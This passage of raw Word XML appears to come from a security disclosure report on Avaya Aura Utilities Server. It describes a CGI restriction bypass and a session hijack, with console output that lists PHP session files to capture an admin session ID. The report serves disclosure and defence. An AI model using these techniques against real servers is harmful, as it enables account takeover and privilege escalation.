          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder provides a convenient exfiltration point, and a useful location to stage additional attacks against other users (such as a location to store a phishing payload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704B627E" w14:textId="2C585F10" w:rsidR="003F3508" w:rsidRDefault="001E48A2" w:rsidP="003F3508">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Ref59003704"/>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="003F3508">
        <w:t>) Application Restriction Bypass via Direct CGI Calls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1F89DC9A" w14:textId="06FE19C3" w:rsidR="00125652" w:rsidRDefault="00125652" w:rsidP="003F3508">
      <w:r w:rsidRPr="00125652">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7.5 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125652">
        <w:t>AV:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00125652">
        <w:t>/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70895F99" w14:textId="5BD48E60" w:rsidR="00125652" w:rsidRPr="00125652" w:rsidRDefault="00125652" w:rsidP="003F3508">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125652">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBFF2BA" w14:textId="7DED7917" w:rsidR="00125652" w:rsidRDefault="003F3508" w:rsidP="003F3508">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered that it was possible to directly access the administrative </w:t>
      </w:r>
      <w:r w:rsidR="00F57F57">
        <w:t>functionality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the Avaya Aura Utilit</w:t>
      </w:r>
      <w:r w:rsidR="003F47A8">
        <w:t>ies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Server once command line code execution was achieved by making CGI requests directly to the main CGI binary</w:t>
      </w:r>
      <w:r w:rsidR="00F57F57">
        <w:t xml:space="preserve">, even when </w:t>
      </w:r>
      <w:r w:rsidR="00231CD9">
        <w:t>sections of the application are not accessible via HTTP(S) due to a restricted</w:t>
      </w:r>
      <w:r w:rsidR="00F57F57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:commentRangeStart w:id="5"/>
      <w:r w:rsidR="00F57F57">
        <w:t>Apache configuration</w:t>
      </w:r>
      <w:r w:rsidR="00125652">
        <w:t>.</w:t>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r>
        <w:commentReference w:id="4"/>
      </w:r>
      <w:commentRangeEnd w:id="5"/>
      <w:r w:rsidR="00DA43ED">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="5"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257FDD5" w14:textId="38C83146" w:rsidR="00125652" w:rsidRPr="00125652" w:rsidRDefault="00125652" w:rsidP="003F3508">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AEE31B" w14:textId="03443CF3" w:rsidR="003F47A8" w:rsidRDefault="00125652" w:rsidP="003F3508">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to make direct CGI calls to the main SUID-as-root </w:t>
      </w:r>
      <w:r w:rsidR="70E1CBA8">
        <w:t>CGI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary </w:t>
      </w:r>
      <w:r w:rsidR="003F3508">
        <w:t xml:space="preserve">(located at </w:t>
      </w:r>
      <w:r w:rsidR="003F47A8">
        <w:t>/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F47A8">
        <w:t>avaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F47A8">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F47A8">
        <w:t>smi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F47A8">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F47A8">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F47A8">
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F47A8">
        <w:t>cgi_main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F47A8">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the Avaya Aura Utilities Server</w:t>
      </w:r>
      <w:r w:rsidR="003F47A8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Using this technique, as well as other vulnerabilities within this report, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to achieve root code execution starting only with “apache” user command-line access. Examples of how this can be achieved are present in Issue “</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref59003335 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>6) Session Forgery Authentication Bypass and Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>” as well as in “</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58936618 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>Appendix 2: Full Pre-Auth RCE to Root Proof-of-Concept</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F47A8">
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F47A8">
        <w:t xml:space="preserve"> is uncertain whether this should be considered a bypass however in the client environment where the vulnerabilities were original discovered, the admin section of the application was not accessible due to </w:t>
      </w:r>
      <w:r w:rsidR="00231CD9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00231CD9">
        <w:t xml:space="preserve">restrictive </w:t>
      </w:r>
      <w:r w:rsidR="003F47A8">
        <w:t>Apache configurations</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003F47A8">
        <w:t xml:space="preserve"> which did not expose the admin section via HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00B32481">
        <w:t>(S)</w:t>
      </w:r>
      <w:r w:rsidR="003F47A8">
        <w:t xml:space="preserve">. For this reason, the proof-of-concept code </w:t>
      </w:r>
      <w:r w:rsidR="004B2DC0">
        <w:t>provided through-out this report makes use of these direct CGI calls instead of HTTP requests</w:t>
      </w:r>
      <w:r w:rsidR="003F47A8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43156C60" w14:textId="1FE35CA2" w:rsidR="003F47A8" w:rsidRDefault="001E48A2" w:rsidP="003F47A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Ref58922239"/>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:commentRangeStart w:id="7"/>
      <w:commentRangeStart w:id="8"/>
      <w:r w:rsidR="003F47A8">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:t>Session Hijack Vulnerability</w:t>
      </w:r>
      <w:commentRangeEnd w:id="7"/>
      <w:r w:rsidR="00415140">
        <w:commentReference w:id="7"/>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:commentRangeEnd w:id="8"/>
      <w:r w:rsidR="00E37422">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="8"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AFD859" w14:textId="529DD40B" w:rsidR="00FB7FA0" w:rsidRPr="00FB7FA0" w:rsidRDefault="00FB7FA0" w:rsidP="00FB7FA0">
      <w:r w:rsidRPr="00FB7FA0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.2 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB7FA0">
        <w:t>AV:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB7FA0">
        <w:t>/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFB7A1" w14:textId="484165EA" w:rsidR="00FB7FA0" w:rsidRPr="00FB7FA0" w:rsidRDefault="00FB7FA0" w:rsidP="003F47A8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB7FA0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C63C3" w14:textId="233C5E92" w:rsidR="00FB7FA0" w:rsidRDefault="003F47A8" w:rsidP="003F47A8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> discovered an authentication bypass and privilege escalation vulnerability which would allow an attacker that had gained command-line code-execution as the </w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t>“a</w:t>
      </w:r>
      <w:r>
        <w:t>pache</w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user (such as by using Issue </w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58918130 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234" w:rsidRPr="00F94D6F">
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve"> Pre-Authentication Remote Code Execution</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to gain access to the administrative section of the </w:t>
      </w:r>
      <w:r w:rsidR="00367285">
        <w:t>Avaya</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Aura Utilities Server </w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t>via a session hijack attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A679C2" w14:textId="77777777" w:rsidR="00FB7FA0" w:rsidRDefault="00FB7FA0" w:rsidP="003F47A8">
      <w:r w:rsidRPr="00FB7FA0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25588D" w14:textId="6CF4E313" w:rsidR="00272B68" w:rsidRDefault="003F47A8" w:rsidP="00272B68">
      <w:r>
        <w:t>The administrative section of the Avaya Aura Utilities Server is primarily handled via the SUID-as-root CGI binary located at: /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi_main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>With the exception of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a few privileged operations, when a user authenticates to the admin section, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi_main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary drops privileges to the local Linux account that the user has authenticated as.</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> When an unauthenticated user initially visits the Admin section login page, a PHP session is created for the user and a session cookie </w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00272B68">
        <w:t>sessionId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00272B68">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t>is sent back to the user’s browser. The session data is stored in “</w:t>
      </w:r>
      <w:r w:rsidR="00163B30" w:rsidRPr="00163B30">
        <w:t>/var/lib/php/session</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163B30">
        <w:t>sess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163B30">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00163B30" w:rsidRPr="00367285">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;session cookie id&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve">” and is a PHP serialized object. Before authentication, this session file is owned and writable by the apache user. Once a user authenticates, this session file is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163B30">
        <w:t>chown’ed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163B30">
        <w:t>cgi_main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163B30">
        <w:t xml:space="preserve"> to be owned by the Linux account that corresponds to the authenticated user. </w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00272B68">
        <w:t>ith the above information alone, it is possible for an attacker running as the apache user with command-line access to hijack any existing, active sessions by simply listing the files under /var/lib/php/session/ and grabbing the session id part of the file name.  Below is console output showing how an attacker might perform this session hijack attack (with admin session highlighted):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00272B68" w14:paraId="4951DB92" w14:textId="77777777" w:rsidTr="00272B68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="39C2FE60" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>root@localhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>admin]#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> apache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A58AF6" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Last login: Tue Dec 15 10:31:55 UTC 2020 on pts/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D0A9ED" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>bash-4.1$ ls -la /var/lib/php/session/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D13C988" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>total 136</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B27377B" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>drwxrwx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">---. 2 root   apache 102400 Dec 15 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>10:32 .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7A8831B0" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-x. 3 root   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">     4096 Oct </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>30  2014</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55E71C21" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00272B68">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00272B68">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00272B68">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-------  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00272B68">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> admin  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00272B68">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>susers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00272B68">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">   3837 Dec 15 10:32 sess_08js5l3vbgip3ump7ovrgp9ov4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E2F0D1C" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>-------  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">   6781 Dec 14 15:44 sess_43k4r6gl2fqolgl9coqkqbcon1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E16ACF6" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>-------  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">   6786 Dec 14 13:25 sess_9gji7nqulvtcj40a4jc7n51og7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F61F47" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>-------  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">   3425 Dec 15 10:32 sess_df9949siu7mor9k6ol7b6cb712</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1AAC53" w14:textId="77777777" w:rsidR="00272B68" w:rsidRDefault="00272B68" w:rsidP="00272B68">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>-------  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">     49 Nov 12 13:09 sess_lvjb79bu8vjqn2m9kc5mtrtla5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3253CD61" w14:textId="53FACFF0" w:rsidR="003530FD" w:rsidRDefault="003530FD" w:rsidP="003530FD"/>
    <w:p w14:paraId="580811E3" w14:textId="0878D105" w:rsidR="003530FD" w:rsidRDefault="003530FD" w:rsidP="003530FD">
      <w:r>
        <w:t xml:space="preserve">Sessions are tied to user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so session token hijacking is a bit more complicated than just stealing a session token. However, an attacker with command</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>line access could use direct CGI calls</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t xml:space="preserve"> (see related Issue “</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:instrText xml:space="preserve"> REF _Ref59003704 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>4) Application Restriction Bypass via Direct CGI Calls</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t>”)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to emulate traffic from any IP (and discover the IP from the Apache log</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t xml:space="preserve"> or by reading the session file before the user completes authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Another </w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t>common</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scenario</w:t>
      </w:r>
      <w:r w:rsidR="000A1A59">
        <w:t xml:space="preserve"> where this vulnerability could easily be abused</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FA0">
        <w:t xml:space="preserve"> is when </w:t>
      </w:r>
      <w:r>
        <w:t>all users share the same IP such as when the Avaya Aura Utilities Server is behind a reverse proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B6DD9E" w14:textId="70656ABF" w:rsidR="00B53343" w:rsidRDefault="001E48A2" w:rsidP="00B53343">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Ref59003335"/>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00B53343">
        <w:t>) Session Forgery Authentication Bypass and Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
